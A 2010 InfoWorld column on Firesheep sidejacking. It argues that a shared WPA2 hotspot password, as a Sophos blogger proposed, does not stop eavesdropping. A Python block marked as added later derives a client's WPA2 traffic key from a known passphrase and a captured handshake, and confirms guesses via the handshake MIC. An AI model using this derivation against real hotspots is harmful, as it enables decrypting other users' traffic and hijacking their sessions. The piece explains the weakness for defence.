November 10, 2010

'Sidejacking' browser add-on stumps security experts

Sophos offers novel approach to protecting open Wi-Fi hotspots from Firesheep snooping. Two problems: First, it won't work. Second, it won't work

By Woody Leonhard | InfoWorld



Last month security researcher Eric Butler released a simple Firefox add-on called Firesheep that makes it one-click easy to snoop on unencrypted Wi-Fi connections. If you're on a Wi-Fi network that doesn't use encryption, anybody with a laptop and Firesheep can watch the plain-HTTP traffic you send. Worse, Firesheep picks the session cookies out of that traffic, so the person eavesdropping can step into your shoes and interact with websites precisely the same way you do, logged in as you, without ever learning your password.

The technique, known as sidejacking, involves a long-known hole in the way websites work: many sites protect your password with HTTPS at login, then hand back a session cookie and accept it over plain HTTP on every request that follows. Whoever captures that cookie can replay it, and as far as the site is concerned, that person is you.

There are three easy ways to thwart Firesheep and its sidejacking. First, if you're interacting with a secure website ("https") for the whole session, not just the login page, Firesheep can't come in and watch; a site that encrypts the login and then drops back to plain HTTP still leaks the cookie, which is exactly what Firesheep exploits. Second, if you're running a VPN, all of your Wi-Fi traffic is tunneled and, thus, hidden from anyone on the hotspot. Third, you can set up an encrypted connection with your Wi-Fi router.

That revelation has led many security experts to suggest that people actually use the WPA2 encryption available on almost every modern wireless access point. We're not talking rocket science: Enable WPA2 on your router, choose a strong passphrase, give it out only to people you want to use the router, and a snooper outside that group sees nothing but ciphertext. Firesheep doesn't stand a chance.

Unfortunately, some security experts don't understand the details and are doling out bad advice. Cue Chester Wisniewski, a senior security advisor at Sophos Canada. Yesterday Wisniewski posted an article entitled "Dear Starbucks: The skinny on how you can be a security hero" on the Sophos blog. Wisniewski noted that Starbucks, among a zillion others, has unencrypted Wi-Fi hotspots open to the public: If you want to use Wi-Fi at Starbucks, you simply connect to the router, no password required.

Firesheep loves those kinds of connections. Snooping them is absolutely trivial.

Wisniewski suggests that all of those open, unencrypted Wi-Fi hotspots should switch over to WPA2 encryption -- but all of the hotspots should use the same password.

I propose standard adoption of WPA2 and a default password of "free". Whenever you wish to connect to complimentary Wi-Fi, you select "Courtyard Marriott" or "Starbucks" like you always have, but you are then prompted for a password.

On the surface, that sounds like an interesting idea. But if you dig a bit, you'll wonder how that post ever made it onto Sophos's site.

Let's ignore for the moment the fact that "free" can't be a WPA2 passphrase at all: a WPA2-PSK passphrase must be between eight and 63 characters long.

More to the point, if you know or can guess a Wi-Fi router's WPA2 passphrase and capture the handshake a client performs when it joins, snooping on that client, and on everyone else using the hotspot, is straightforward. As far as I know, nobody's written a program that will provide Firesheep capability over a WPA2-protected network, but the steps for doing so are well-known. A Sophos blog participant who uses the handle Stephan puts it this way:

[W]hen everyone uses the same password, everyone will end up with the same key, which is intended for use by the client and access point, but if someone else knows the password he will be able to come up with the same key.

Later on WPA2 uses this key derived from the password (called the Pairwise Master Key, PMK) to negotiate new keys (called Pairwise Transient Keys, PTKs) to encrypt the actual payload, but if you're there while one of these PTKs gets negotiated by use of the PMK, which will happen at the beginning of the session, and periodically during the session, then you will be able to tap this, and therefore also the whole conversation.

In short, putting WPA2 encryption on a wireless router only protects you if you limit the number of people who have the key. If the key becomes well-known -- "free" in this case -- anyone who holds it and watches a client join can derive that client's session keys, and you can throw your security out the window.
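To make Stephan's point concrete, here is the derivation an eavesdropper who knows the shared passphrase performs. This is example code added for this edit, not code from the article, from Sophos, or from the commenter. The SSID, MAC addresses, nonces, passphrase and the stand-in message-2 frame are constructed values; only the PBKDF2 step is checked against the published IEEE 802.11 Annex H test vector (passphrase "password", SSID "IEEE").

```python
import hashlib
import hmac

# Constructed, hypothetical values: nothing here was captured from a real network.
SSID = "Starbucks"
HOTSPOT_PASSPHRASE = "freecoffee"        # the published passphrase in a shared-WPA2 scheme
AP_MAC = bytes.fromhex("001122aabbcc")   # AA: the access point's address
STA_MAC = bytes.fromhex("66778899ddee")  # SPA: the laptop's address
ANONCE = bytes(range(32))                # both nonces travel in the clear in handshake messages 1 and 2
SNONCE = bytes(range(100, 132))
# Simplified stand-in for the EAPOL-Key frame of message 2 with its 16-byte MIC field zeroed.
MSG2_FRAME = b"\x02\x03" + bytes(2) + b"\x02" + SNONCE + bytes(16) + bytes(20)


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK (the PSK) = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("a WPA2-PSK passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4))
    return b"".join(blocks)[:64]


def wpa2_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PTK from the PMK plus the four public handshake inputs, split into KCK, KEK and TK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf_512(pmk, b"Pairwise key expansion", data)
    return {"KCK": ptk[:16], "KEK": ptk[16:32], "TK": ptk[32:48]}


def eapol_mic(kck: bytes, frame_with_zeroed_mic: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = first 16 bytes of HMAC-SHA1(KCK, frame)."""
    return hmac.new(kck, frame_with_zeroed_mic, hashlib.sha1).digest()[:16]


def station_joins(passphrase: str):
    """What the legitimate laptop does: derive its keys and sign handshake message 2."""
    keys = wpa2_ptk(wpa2_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return keys["TK"], MSG2_FRAME, eapol_mic(keys["KCK"], MSG2_FRAME)


def eavesdropper_recovers_tk(guess, ssid, aa, spa, anonce, snonce, msg2_frame, msg2_mic):
    """A third party who knows (or guesses) the passphrase and saw the handshake.

    Everything except the passphrase was broadcast in the clear, so the same
    derivation yields the same TK. The MIC on message 2 confirms the guess
    before a single data frame is decrypted. Returns the TK, or None if the
    guess is wrong or is not even a valid passphrase (e.g. "free").
    """
    try:
        pmk = wpa2_pmk(guess, ssid)
    except ValueError:
        return None
    keys = wpa2_ptk(pmk, aa, spa, anonce, snonce)
    if not hmac.compare_digest(eapol_mic(keys["KCK"], msg2_frame), msg2_mic):
        return None
    return keys["TK"]


if __name__ == "__main__":
    tk, frame, mic = station_joins(HOTSPOT_PASSPHRASE)
    args = (SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, frame, mic)
    print("eavesdropper holds the laptop's traffic key:", eavesdropper_recovers_tk(HOTSPOT_PASSPHRASE, *args) == tk)
    print("wrong guess rejected by the MIC check:", eavesdropper_recovers_tk("wrongguess", *args) is None)
```

The cost to the eavesdropper is one PBKDF2 run per passphrase plus four HMACs per handshake, which is why a published passphrase buys nothing against other users of the same hotspot: it is the same derivation Wireshark and aircrack-ng's airdecap-ng perform when handed a passphrase and a captured handshake. Note that the SSID is mixed into the PMK, so the "free" passphrase yields a different PMK at every hotspot, but that makes no difference when the attacker can read both the SSID and the passphrase off the wall.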

No matter what the experts say.